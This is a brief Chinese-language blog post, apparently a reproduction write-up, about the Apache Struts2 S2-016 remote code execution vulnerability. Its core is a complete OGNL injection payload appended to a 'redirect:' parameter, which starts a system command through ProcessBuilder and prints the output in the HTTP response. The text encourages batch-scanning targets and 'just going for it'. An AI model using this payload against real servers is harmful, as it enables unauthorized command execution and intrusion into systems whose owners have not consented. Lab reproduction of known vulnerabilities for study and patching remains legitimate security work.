Apache Struts2远程代码执行漏洞(S2-016)复现

基于Apache Struts2框架的一次复现

直接使用工具检查是否存在漏洞

发现存在S2-016,进行命令执行

批量检查,很方便,直接搞就行。(需要url编码)

payload

url+index.action?redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'ls','/'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}

点赞

发表评论

电子邮件地址不会被公开。必填项已用 * 标注